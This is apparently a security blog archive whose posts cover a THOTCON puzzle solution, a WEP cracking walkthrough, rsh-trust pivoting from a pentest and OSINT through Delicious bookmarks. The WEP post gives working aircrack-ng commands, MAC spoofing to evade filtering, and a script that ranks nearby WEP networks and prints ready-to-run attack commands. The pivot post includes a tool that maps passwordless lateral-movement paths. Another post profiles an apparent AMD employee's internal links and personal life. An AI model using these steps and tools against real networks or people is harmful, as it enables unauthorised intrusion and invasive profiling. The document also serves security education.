Tag Archives: hacking

Solving the THOTCON 0×2 Pre-Sale Puzzle

Earlier this year, some folks in the Chicago security community got together and organized a conference called THOTCON, which turned out to be a resounding success.  It took place in April and drew several hundred people together for a day filled with some great talks, beer, and general hacking socialness.

To gather some early buzz (as well as to have some fun) for the follow-up next spring, the organizers decided to do an early pre-sale puzzle.  Of course, like many things in the security community, the hints were leaked only to their twitter stream.  Inspired by a few of my friends poking at it, and with some free time to spare, in the spirit of learning (and a chance to save about $20!) I decided to take a stab at the puzzle.

By the time I started working on it, the organizers had leaked a few hints.  Here’s where it was at when I began:

Puzzle -> FAW2GlImKsT3BL8yKQF= zf-c75-sb-j 60max #thotcon0x2

Hint #7 – I am the answer to my own puzzle. You just need to look at me the right way
Hint #6 – Decrypt, then decode
Hint #5 – The coolest thing about part 2 is… You don't have to do ANYTHING. (Put it somewhere and tada!)
Hint #4 – Part 2: I’m not a cipher, I’m a conversion. You have the tool to convert me. In fact, you don’t have to convert me.
Hint #3 – Part 1: He is dead
Hint #2 – What do you mean I was part of the Reichstag zu Worms?
Hint #1 – I was born on April 5th. #thotcon0x2 <— puzzle hint?

So, to break it down, the hints indicated a three-step process to solve the initial hint string: decrypt, decode, then convert.

Step 0:

Working from the string:

FAW2GlImKsT3BL8yKQF= zf-c75-sb-j 60max #thotcon0x2

To be honest, I wouldn't have had much to go on here were it not for the hints, and my twitter addiction.  I picked out 'zf', 'c75', 'sb', and 'j' as the handles of several of the organizers (@zfasel, @c7five, @sak3bomb, and @jaku), so those could be dropped.  '60max' is cleartext and probably not a code, so dropped.  '#thotcon0x2' is again twitterese, the hashtag used to talk about the conference.  Dropped.

So we're left with the ciphertext to decode,

FAW2GlImKsT3BL8yKQF=

I suppose that’s a start.

Step 1:

I'm not much of a cryptologist, but I do know a bit of the history, mostly thanks to reading Simon Singh's excellent The Code Book.  I figured it was a reasonable assumption that this is a classical cipher, breakable by hand.  So, poking around Wikipedia for famous classical ciphers, a bit of digging came up with April 5th being the birthday of Blaise de Vigenère (born April 5, 1523), whose name is attached to the famous Vigenère cipher.

This cipher is a polyalphabetic substitution: each letter of the message is shifted by an amount taken from the corresponding letter of a repeating keyword, so the same plaintext letter can encrypt to different ciphertext letters.  A dedicated person could do it by hand.  However, being a citizen of the 21st century, I wanted to put computers to work for me, so I found a site to decode it!

http://sharkysoft.com/misc/vigenere/

Problem was... a Vigenère cipher requires a key to decrypt, and I didn't have one.  So I began guessing.

This required jumping ahead a little bit: what to do with the decrypted ciphertext?  The hint for part 2 said it was a conversion, not a cipher, so my natural first guess was Base64, just because it's so common.  So I began working on the assumption that the decrypted text would be Base64 encoded, found an online decoder, and began guessing away.

Now, a Vigenère cipher is relatively easy to break with modern computing, but twenty characters is far too short for the classical Kasiski or frequency-analysis attacks to get any traction, and I didn't honestly expect the organizers to force people to write a brute forcer.  Instead, I began guessing words associated with the security community, checking each candidate plaintext in the Base64 decoder.  Eventually, after guessing many words... I tried the name of the conference itself, THOTCON0x2.  And bingo!  I had cleartext that was also valid Base64:

MTI2NjUzNzM3NS8wWDI=

Step 2:

I suppose this is a bit redundant since I had been testing my cleartext in the Base64 decoder the entire time.  Using this online decoder:

http://www.motobit.com/util/base64-decoder-encoder.asp

I ended up with some very promising text:

1266537375/0X2

Step 3:

In the spirit of full disclosure here, step 3 was where I performed a bit of 'social surveillance'.  Following the #thotcon hashtag on twitter, I saw Nick, one of the organizers, post a hint saying something to the extent of, "is it alive?"

How do you check if a computer is alive?  Usually a good first step is to ping it.  I already had my suspicions about this string, but this gave me the idea to just ping the decimal number (the '0X2' was clearly intentional, and I dropped it from consideration for the moment).

ping 1266537375

Pinging 75.125.211.159 with 32 bytes of data:
...

Ping did the translation for me, nice!  Now I have a more easily readable IP address.

This string was the 32-bit IPv4 address written as a single decimal integer.  Not commonly used, but still valid: inet_aton() accepts it, and so therefore do ping and most browsers.  If it's used commonly anywhere, it's by spammers and phishers who like to obscure their link targets from a cursory glance (the same trick works with octal and hex octets).  You can read more about it here.
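Putting the three steps together, here is an added example (my own code, not part of the original puzzle or of the online tools I used) that reproduces the chain in Python: the Vigenère decryption, the Base64 decode, and the decimal-to-dotted-quad conversion that ping did for me.  One assumption is baked in, namely the convention the online Vigenère tool evidently used: only letters are shifted, case is preserved, digits and '=' pass through without consuming a key character, and the non-letters in the key are ignored.  That convention reproduces the intermediate string above exactly.  The candidate key list in the demo is made up for illustration.

```python
import base64
import ipaddress

# Values from the puzzle itself.
CIPHERTEXT = "FAW2GlImKsT3BL8yKQF="
KEY = "THOTCON0x2"


def vigenere_decrypt(ciphertext, key):
    """Vigenere decryption in the convention the online tool evidently used
    (an assumption that reproduces the post's intermediate string): only
    letters are shifted, case is preserved, non-letters pass through without
    consuming a key character, and non-letters in the key are ignored."""
    shifts = [ord(k.upper()) - ord("A") for k in key if k.isalpha()]
    if not shifts:
        raise ValueError("key needs at least one letter")
    out, i = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shifts[i % len(shifts)]) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def base64_to_text(s):
    """Return the decoded text if `s` is Base64 for printable ASCII, else None.
    Every letters-only decryption of a Base64-shaped ciphertext is still
    Base64-shaped, so validity alone cannot tell a right key from a wrong one;
    whether the decoded bytes are printable text can."""
    try:
        text = base64.b64decode(s, validate=True).decode("ascii")
    except ValueError:  # bad alphabet/padding, or non-ASCII bytes
        return None
    return text if text.isprintable() else None


def guess_key(ciphertext, candidates):
    """The manual step from the post, automated: first candidate key whose
    decryption decodes to printable text."""
    for key in candidates:
        if base64_to_text(vigenere_decrypt(ciphertext, key)) is not None:
            return key
    return None


def decimal_to_dotted(n):
    """A 32-bit IPv4 address written as one unsigned integer, as ping accepted it."""
    return str(ipaddress.IPv4Address(int(n)))


def dotted_to_decimal(addr):
    """The reverse: how a phisher would obfuscate a link target."""
    return int(ipaddress.IPv4Address(addr))


def solve(ciphertext=CIPHERTEXT, key=KEY):
    """Decrypt, decode, convert: the whole chain in one call."""
    step1 = vigenere_decrypt(ciphertext, key)
    step2 = base64.b64decode(step1, validate=True).decode("ascii")
    decimal_ip, _, path = step2.partition("/")
    host = decimal_to_dotted(decimal_ip)
    return {"vigenere": step1, "base64": step2, "host": host,
            "url": f"http://{host}/{path}/"}


if __name__ == "__main__":
    # Constructed candidate list; only the last one is the real key.
    print("key:", guess_key(CIPHERTEXT, ["chicago", "thotcon", "THOTCON0x2"]))
    for stage, value in solve().items():
        print(f"{stage:>8}: {value}")
```

Note that the lowercase "thotcon" fails even though it is the same word: the 'x' in the key is a real key letter, so the decryption is different, and the printable-text check (not Base64 validity) is what tells the keys apart.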

Step 4:

So now we had an IP address.  Now what?  An nmap scan showed a webserver running on port 80, so I sent my browser there.... and got a blank page.

But wait a minute…. wasn’t there a string I dropped from that address?  ‘/0X2′.  After kicking myself for the brain fart, I navigated to…

http://75.125.211.159/0X2/

And had what looked like a winner!

There were three images there (unfortunately not loading at the time) and a link to the registration page.  Hovering the mouse over the three images revealed some codes:

VEHPVE
NPTJB4M
I0YMDEX

I moved on over to the registration page, concatenated these strings together… and success!  The discount code was accepted.

Conclusion

This puzzle was a fun one, which pushed you to think a bit outside the box.  Also, because it was released ‘into the wild’, the internet was at your full disposal to track down hints.  So while it may have been shortcutting a bit, I didn’t see anything wrong with spying on @c7five as he gave hints to other players ;-)

I don’t know how many pre-sale tickets that they ended up selling, but the initial hint was that they only were offering 60 of them at the discounted price.  So, having solved it before they publicly revealed the pre-sales code, I felt pretty proud of myself.  Perhaps I was just lucky to have the free time to poke at it.  I’ve also gotta thank my friends for pointing me in the right direction after I got stuck (and way to go, Rudy, Jeff and Jim for being more clever than I and figuring it out faster!).

The puzzle appears to have been primarily created by Sak3bomb, who is clearly a brilliant individual, much more clever than those of us trying to work backwards.  Major props to him and his collaborators for putting together a fun puzzle.   He archived the hints on his webpage here:

http://www.haxbysakebomb.com/thotcon.html

I’m really looking forward to the next THOTCON, and general sale tickets are available now – so go on and buy em.  I’ll see you there!

WEP Cracking 101

It's occurred to me that many folks understand WEP is easy to break, but don't know all the steps and just how easy it is.  Here I hope to lay down the basic steps in one coherent post, demonstrating how to crack into a WEP-protected wireless network that has a client attached to it.  The weakness being exploited is WEP's use of RC4 with a 24-bit initialization vector (IV) sent in the clear; collect enough packets with distinct IVs and the key falls out statistically.

Like always… only do this against your own networks.  The legal grounds are a bit grey here, but the ethical grounds are clear – you shouldn’t pick your neighbor’s doorlock.  Being a security professional also comes with the responsibility to use your skills for good, not evil.

Step 0: get the software.

I assume you're using Linux.  These tools do work on OS X but require a bit of tweaking, I think, and I haven't done it myself, so I'll just write up Linux.  You can use a Linux VM, but wireless card support is flakier unless you're using a USB card that can be passed straight through to the guest.

Basically you will only need two packages, kismet and aircrack-ng.

So:
apt-get install kismet
apt-get install aircrack-ng

Step 1: Find a WEP network

Kismet is an amazingly powerful scanning tool and I could write much more about it than we need here.  It takes advantage of the wireless card's "monitor mode", in which the card passively captures every 802.11 frame on the channel it is tuned to, not just frames addressed to it or to a network it has joined, and Kismet analyzes that traffic into a nice list.  It can do all sorts of other neat stuff like GPS logging, but that's not necessary here.

If you don’t know it, you’ll need the interface name for your wireless card.  Check it by typing:

iwconfig
Then just launch kismet (type 'kismet') and it will prompt you for your WLAN card.  It will try to put it into monitor mode and is usually successful, even with built-in wireless.  If not, there's some troubleshooting to be done....

Assuming it works, it will give you a list of networks it sees.  It ‘hops’ channels by switching the frequency the card is listening on and collects traffic on that frequency.  If there’s a WEP network in sight, kismet will highlight it in red, and you will need to pay attention to four things:

  • Its BSSID – the MAC address of the access point's radio
  • The ESSID – the ‘friendly name’ of the network
  • The MAC address of a client that is attached to it.
  • The channel the AP is broadcasting on

Kismet has a column that shows the amount of traffic it sees for both the AP in general and the client.  You want to target one with a client attached that is passing data… they’re the easiest targets.

An alternate path to WLAN monitor mode:

If kismet has a hard time putting your card into monitor mode, try running 'airmon-ng start <interfacename>' and it should attempt to do so.  If that still doesn't work.... investigate getting a new card.  The Alfa AWUS036H is an excellent USB choice.

Step 2: prepare to attack

If it's not set up yet, enable monitor mode (this creates a separate monitor interface, typically wlan0mon, which is what the rest of the commands use):

airmon-ng start <interfacename>

Begin a dump session – this logs traffic, sort of like a lightweight Wireshark.  You want to filter it to the one network we're interested in, and lock the card to that channel so it stops hopping:

airodump-ng --channel <c> --bssid <xx:xx:xx:xx:xx:xx> --write <fileprefixname> <interfacename>

where c: the broadcast channel of the network
xx: BSSID of the network
<interfacename>: the monitor-mode interface airmon-ng created (e.g. wlan0mon), not the original wlan0

Keep this running and launch a new window for the next steps.

Step 3: do an ARP replay attack

This watches for an ARP request from the attached client and replays it to the AP over and over.  WEP has no replay protection, so the AP accepts each copy and answers it, and every answer is a fresh packet encrypted under a new IV.  That is what builds a data set large enough to mount the statistical (PTW) attack against WEP, and it is why a network with an active client is the easy target.

aireplay-ng --arpreplay -h <xx:xx:xx:xx:xx:xx> -b <yy:yy:yy:yy:yy:yy> <interfacename>

where xx: the MAC address of the client
yy: BSSID of the network
<interfacename>: the monitor-mode interface (e.g. wlan0mon)

Once this has started, check out the other window.  You should see the #Data count in airodump-ng increasing rapidly.  When you're at about 40k there is enough for a good chance at a 104-bit WEP key.  The more the better, but no harm in starting early...
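As an added example (my own code, not part of the aircrack-ng suite or of the original walkthrough), here is a Python script that reads the CSV file airodump-ng writes next to the .cap (<fileprefixname>-01.csv), picks out the WEP networks, pairs them with their associated clients, checks the IV count against the 40k threshold, and prints the exact airodump-ng/aireplay-ng/aircrack-ng commands from these steps filled in for each target.  The CSV sample is constructed for the example; the column names are the ones airodump-ng's CSV output uses, and the parser keys on the header row rather than column positions so minor layout differences between versions don't matter.  The interface name (wlan0mon) and capture prefix are assumptions.

```python
import csv
import io
import re

# Constructed sample of the CSV airodump-ng writes next to the .cap file
# (<prefix>-01.csv); the MACs, names and counts are made up. The file has
# two comma-separated tables, access points then stations, separated by a
# blank line, each with its own header row.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-06-01 12:00:00, 2010-06-01 12:10:00,  6,  54, WEP , WEP, , -40, 1200, 41234,   0.  0.  0.  0,   7, HomeNet,
66:77:88:99:AA:BB, 2010-06-01 12:00:00, 2010-06-01 12:10:00, 11,  54, WPA2, CCMP, PSK, -60,  800,     0,   0.  0.  0.  0,   6, Office,
CC:DD:EE:FF:00:11, 2010-06-01 12:00:00, 2010-06-01 12:10:00,  1,  11, WEP , WEP, , -70,  300,   150,   0.  0.  0.  0,   5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2010-06-01 12:01:00, 2010-06-01 12:10:00, -45, 31000, 00:11:22:33:44:55, HomeNet
AA:BB:CC:DD:EE:02, 2010-06-01 12:02:00, 2010-06-01 12:09:00, -55,    20, (not associated) , Office,HomeNet
"""

IV_GOAL = 40000  # roughly enough for aircrack-ng's PTW attack on a 104-bit key


def _parse_section(section):
    """One header-led CSV table as a list of dicts keyed by stripped header name."""
    rows = list(csv.reader(io.StringIO(section), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    return [dict(zip(header, (v.strip() for v in row))) for row in rows[1:] if row]


def parse_airodump_csv(text):
    """Split the file into its AP and station tables."""
    sections = [s for s in re.split(r"\n\s*\n", text.strip()) if s.strip()]
    aps = _parse_section(sections[0])
    stations = _parse_section(sections[1]) if len(sections) > 1 else []
    return aps, stations


def wep_targets(aps, stations, iv_goal=IV_GOAL):
    """WEP networks, best target first: ones with an associated client, then
    by IVs already captured."""
    clients = {}
    for st in stations:
        if st["BSSID"] != "(not associated)":
            clients.setdefault(st["BSSID"], []).append(st["Station MAC"])
    targets = []
    for ap in aps:
        if not ap["Privacy"].startswith("WEP"):
            continue
        ivs = int(ap["# IV"])
        targets.append({
            "bssid": ap["BSSID"], "essid": ap["ESSID"], "channel": int(ap["channel"]),
            "ivs": ivs, "clients": sorted(clients.get(ap["BSSID"], [])),
            "ready": ivs >= iv_goal,
        })
    targets.sort(key=lambda t: (bool(t["clients"]), t["ivs"]), reverse=True)
    return targets


def attack_commands(target, iface="wlan0mon", prefix="capture"):
    """The commands from steps 2-4 above, filled in for one target.
    Interface name and capture prefix are assumptions."""
    cmds = [f"airodump-ng --channel {target['channel']} --bssid {target['bssid']} "
            f"--write {prefix} {iface}"]
    if target["clients"]:  # no client, no ARP request to replay
        cmds.append(f"aireplay-ng --arpreplay -b {target['bssid']} "
                    f"-h {target['clients'][0]} {iface}")
    cmds.append(f"aircrack-ng -b {target['bssid']} {prefix}-01.cap")
    return cmds


if __name__ == "__main__":
    for t in wep_targets(*parse_airodump_csv(SAMPLE_CSV)):
        status = "ready to crack" if t["ready"] else f"need ~{IV_GOAL - t['ivs']} more IVs"
        print(f"{t['essid']} ({t['bssid']}, ch {t['channel']}): "
              f"{len(t['clients'])} client(s), {t['ivs']} IVs, {status}")
        for cmd in attack_commands(t):
            print("   ", cmd)
```

Run it against a real <fileprefixname>-01.csv while airodump-ng is writing and the IV column is what you would otherwise be reading off the #Data counter by eye.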

Step 4: mount the cryptographic attack

From the same directory you launched the dump process, just run this (airodump-ng numbers its output files, so the first capture is <fileprefixname>-01.cap; add -b <bssid> if the capture contains more than one network):

aircrack-ng <fileprefixname>-01.cap

This will launch a window that shows progress.  If it's successful, you'll see the key!  If not... keep waiting for more traffic.  40k+ data packets increases your odds tremendously, and a shorter 64-bit (40-bit) key needs far fewer.  aircrack-ng will re-read the capture and retry as it grows, so you can leave it running.  Or quit it (ctrl-c) and wait till you have more.

Step 5: connect!

If all went well you have broken the WEP key via the PTW attack method.  Now you can connect to the network.  Close down the dump and replay sessions, then take the card out of monitor mode with airmon-ng stop <monitor interface> (e.g. wlan0mon), which removes the monitor interface and returns the card to ordinary managed mode.

Then you've just gotta connect:
ifconfig <interface> up - bring up the wlan card

iwconfig <interface> mode managed key [WEP key] - set the key; aircrack-ng prints it as hex bytes, which is the form iwconfig takes (use s:<text> instead for an ASCII key)

iwconfig <interface> essid "[ESSID]" (Specify ESSID for the WLAN)

dhclient <interface> (to receive an IP address, netmask, DNS server and default gateway from the Access Point)

If all goes well you’ll get an IP and then you’re good to go, test by pinging or whatever else.

But if it didn't work, they may have MAC filtering in place...

So change the MAC address of your wireless card to the same one as the client you just cracked with!  This is a bit messy: the legitimate client is still on the network with that address, so the AP and its DHCP server may get confused, but it's worth a shot.

Bring the card down first:

ifconfig wlan0 down

Then change the MAC:

ifconfig wlan0 hw ether xx:xx:xx:xx:xx:xx

Bring it back up again and repeat the connection steps.  You should be good to go.

This is a simplified walkthrough of a process that is documented many other places.  It should give you a taste of kismet, and the basics of the aircrack-ng suite, which has many many other great features.  I encourage you to read all about it over on their website.

Additionally, their site also contains a much more in-depth WEP crack tutorial.

Again, this is not ground-breaking, but it is always good to share the fundamentals in case someone hasn’t seen it before.  Good luck!

Pivot Mercilessly!

I just returned from a great trip to SANS 2010, in Orlando, where I was taking SEC 560 – Penetration Testing.  Our instructor, Ed Skoudis (an amazing guy, by the way), repeatedly hammered into our brains the mantra “Pivot Mercilessly!”

This concept is something that a penetration tester or vulnerability assessor needs to always keep in mind – look for the easy toehold into a system, and then see where you can go from there.  “Pivot” throughout the environment using the weak link as a starting point.

I was performing an assessment recently on a Solaris system that demonstrated this concept very effectively.  One of the boxes was vulnerable to a relatively old telnet vulnerability, which we exploited with pleasure, granting us root access to the machine.  From there, we examined the trust relationships inside the network and noticed that this box had Berkeley "r-service" (rsh/rlogin) trust set up with many other machines, the /etc/hosts.equiv and .rhosts entries that let a trusted host log in without a password.  So we used rsh to connect to numerous other boxes, all with root level access, and from those boxes to others... quickly we had the entire system PWNED.

All of this was made possible by a single box with one weak spot.  This is likely the case with most systems out there – maybe you’ll have one or two boxes vulnerable to exploits, especially in a well-managed corporate network.  From there, it’s up to you to pivot your way through the rest of the system!
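To make "pivot mercilessly" concrete, here is an added example (my own code, unrelated to the assessment above or to any SANS material) that models the r-service trust I found: it parses the /etc/hosts.equiv and .rhosts files collected from each compromised box, builds the graph of who may rsh into whom without a password, and walks it from the initial foothold to list every host reachable by chained logins.  The hostnames and file contents are constructed for the example.  One caveat the model makes explicit: a trust file on host T says who may get into T, so the graph only fills in as you pull files off more boxes; in practice an identical hosts.equiv copied across a cluster is what turns one root shell into all of them.

```python
from collections import deque

# Constructed sample (hypothetical hostnames): the r-service trust files read
# off each box as it was compromised. A line in /etc/hosts.equiv or a .rhosts
# file on host T names a remote host S that may rsh/rlogin into T without a
# password, i.e. an edge S -> T in the pivot graph. Netgroups (@name) are
# not expanded here.
COLLECTED_TRUST_FILES = {
    "sol1": {"/etc/hosts.equiv": "sol2\nsol3\n# ops cluster\n",
             "/.rhosts": "admin-ws root\n"},
    "sol2": {"/etc/hosts.equiv": "sol1\nsol3\n",
             "/.rhosts": "+\n"},                    # '+' trusts every host
    "sol3": {"/etc/hosts.equiv": "sol1\nsol2\ndb1\n",
             "/.rhosts": ""},
    "db1":  {"/etc/hosts.equiv": "-sol3\nsol2\n",   # '-host' explicitly denies
             "/.rhosts": "sol3\n"},
}

ANY_HOST = "*"


def parse_trust_file(text):
    """Yield (host, user, allowed) per entry. Entries are 'host [user]';
    a leading '-' denies, '+' is the any-host wildcard; comments and blank
    lines are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        allowed = not host.startswith("-")
        host = host.lstrip("-")
        if host:
            yield (ANY_HOST if host == "+" else host), user, allowed


def build_pivot_graph(collected):
    """Map source host -> set of hosts it can log into without a password.
    Denies override allows; the exact precedence between hosts.equiv and
    .rhosts differs between Unix flavours, so this is a deliberately simple
    model and a real path should be confirmed with an actual rsh."""
    allow, deny = {}, set()
    for target, files in collected.items():
        for text in files.values():
            for src, _user, allowed in parse_trust_file(text):
                if allowed:
                    allow.setdefault(src, set()).add(target)
                else:
                    deny.add((src, target))
    for src, target in deny:
        allow.get(src, set()).discard(target)
    return allow


def pivot_paths(graph, start):
    """Breadth-first search from the foothold: every other host reachable by
    chaining passwordless r-service logins, with the shortest chain to each."""
    paths = {start: [start]}
    queue = deque([start])
    while queue:
        here = queue.popleft()
        reachable = graph.get(here, set()) | graph.get(ANY_HOST, set())
        for there in sorted(reachable):
            if there not in paths:
                paths[there] = paths[here] + [there]
                queue.append(there)
    del paths[start]
    return paths


if __name__ == "__main__":
    graph = build_pivot_graph(COLLECTED_TRUST_FILES)
    for host, chain in sorted(pivot_paths(graph, "sol1").items()):
        print(f"{host:10s} via {' -> '.join(chain)}")
```

In the sample, sol3 is listed in db1's .rhosts but denied in its hosts.equiv, so the search routes to db1 through sol2 instead; that is exactly the kind of detail worth checking by hand before reporting a pivot path.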

Information Leakage via Delicious

By now, the concept of “google hacking” is pretty commonly understood.  People may not be preventing it very well, but it’s moved beyond a new thing.

For the uninitiated, though, here’s a brief summary: using Google (or any other search engine – but really, is there any other?) to find vulnerable web apps, personal information, mp3s in public directories, etc etc.  It’s great fun, and a pretty fundamental initial step of profiling an attack target.

Johnny Long was one of the main evangelists of this method and has a great database of search terms.  It’s no longer actively maintained, but you can still find plenty of good information with this as a starting point!

So Google hacking is great, but it only gets you to the public internet.  What if I wanted to profile the inside of a company, from the outside?  And passively – without hitting their servers myself?  Wouldn’t it be great if I could look for public information shared by company insiders?

Delicious seems almost perfectly designed to do this kind of activity.  For the unfamiliar, delicious is an online bookmarking site, designed around the idea that sharing bookmarks is a great way to learn about new sites.  Which is an alright idea…  but don’t people also bookmark a lot of private information?  I sure do!

Making matters worse, delicious encourages users to get started by uploading their browser bookmarks.  Essentially uploading gobs of potentially personal data to a public site.  This is a classic case of information leakage.  A dedicated attacker can use this public information to get all sorts of juicy tidbits about a company.

Let’s do some examples.  This all works great in theory, but, like Google, there is a LOT of data to sort through.  Say I’m a bad guy interested in insider information about a company.  I can start looking for the basics – say… “intranet”.  Delicious makes this easier by encouraging users to tag their posts for easy categorization:

http://delicious.com/tag/intranet

So that gives me everything that users have tagged with ‘intranet’.   Lots of sites about intranet design, usability, etc.  But also sites tagged by users to manage their own bookmarks!  So I’ll start digging into an individual company… how about AMD?

http://delicious.com/search?p=amd&u=&chk=&context=recent&tag=intranet

[Screenshot: intranet_amd]

The first result doesn't look interesting, but the second and third, well those sound like intranet sites!  Trying to follow them confirms it: the hostnames don't resolve in public DNS.  Nice!  Now let's see what else this presumed AMD employee has bookmarked...

[Screenshot: links_1]

Wow, lots of development related links!  Interesting.  And what’s that link on page 2 about “AMD Manager Toolkit” ??  This fellow looks like he’s a technical manager at AMD!

Dig a little deeper, and it looks like we have another intranet site – mentioning the (presumably internal) code name of a project.  Interesting!  Go further into the links, and you see even further links to internal project Wiki pages.

[Screenshot: links_2]

Surfing around to a few of the non-intranet sites gives me an even better profile of this person.  They work with unit testing.  They use UML, C++, and Ruby, and read a lot about circuit design.  They live in India.  They’re learning guitar, and are interested in martial arts.

This may seem like innocent information to an outsider, but if I was doing this for espionage purposes, I just learned a lot about the internal operations of a project – and this is with 10 minutes of work on one webpage.  What else could I find if I dug through the internet further?

Web 2.0 is a lot of fun, and can be really useful.  But what’s often overlooked are the implications of sharing all this information.  Unless you make it a point to protect your privacy, that privacy probably doesn’t exist.  And for businesses, this can be a major potential risk.

Delicious certainly doesn’t help stop this – according to the FAQ, you cannot make your links private by default, but instead must manually edit them to make them private.  And also, the TOS leaves responsibility entirely in the hands of the users.  Very laissez-faire!

Should companies ban employees from using sites like delicious?  Probably not.  But I think that this demonstrates that employees need to be more educated on what they are exposing themselves and their employer to when using social networking sites.

Where Have We Been?

Wow, it’s been over a month without much action here at Securism.  But it’s not for lack of stuff to talk about – precisely the opposite, we’ve all been so incredibly busy that this little blog has fallen by the wayside.  But I promise that we’ll get right back up at it!  In the meantime, here’s what we’ve all been doing.

Ben and I both attended the SANS 2009 conference in early March, in Orlando.  He was in the advanced penetration testing class, and I was taking the wireless security class.  Verdict on both of those: AWESOME.

Walter also went to a SANS conference in Phoenix to attend a class on secure network design.

I also just finished the EC-Council Certified Ethical Hacker program, which is a good overview certification class.  Don’t underestimate that exam – it’s a tricky one!

Beyond the gobs of training, we’ve also been working on some great stuff at work, getting well up to our necks in the world of PCI.

So, dear readers, don’t fret.  We’re still here, and will be back shortly!

With Great Power, Comes Great Responsibility

Last week’s SANS newsletter caught my eye for an interesting story mentioned in it – “Wireless Hacking Braggarts Avoid Jail Time”.  It links to a story in the Cleveland Plain Dealer about two security consultants who were caught in a FBI sting for wirelessly stealing data from a fake defense contractor.

These two fellows were approached with a great offer – $100,000(!) – to grab some files wirelessly and discreetly.  The FBI got the idea of approaching them after they mentioned in an article in Crain’s Cleveland Business that they had broken into several networks wirelessly, and that companies should hire them to protect their networks.  Whoops!

This brings up a tricky question about infosec in general – in a business environment that is only slowly becoming aware of the issue of security, how does one generate new business?  It can seem tempting to 'demonstrate' the cost of bad security to a client – and cold-calling a business with information about their vulnerabilities is a sure way to wreck that relationship.  The responsibilities of a security professional are to clearly communicate the importance of a strong security posture and to let that information speak for itself.

These two guys took exactly the wrong approach to selling computer security – becoming the 'bad guys' that they're supposed to be protecting clients against!  In the security field, more than many others, the line between 'good guy' and 'bad guy' can be blurry.  An infosec professional who is only using commercial tools isn't really getting into the head of a 'bad guy' – because the bad guys are using open source tools, not the expensive Foundstone package.  We've got to get into the minds of the threats in order to defend against them.

This is where professional programs like CEH have value.  This program teaches security professionals both the tools of the ‘bad guys’, and the ethics required to use them properly.  The temptation of a quick payday may be lurking for some people, but it’s good to see that the FBI and other government organizations are actively watching out for these type of people.

As Spiderman said – “With great power, comes great responsibility”.  Security professionals need to keep this at the forefront of their mind at all times.  We’d probably be better off by not wearing tights and a mask, though!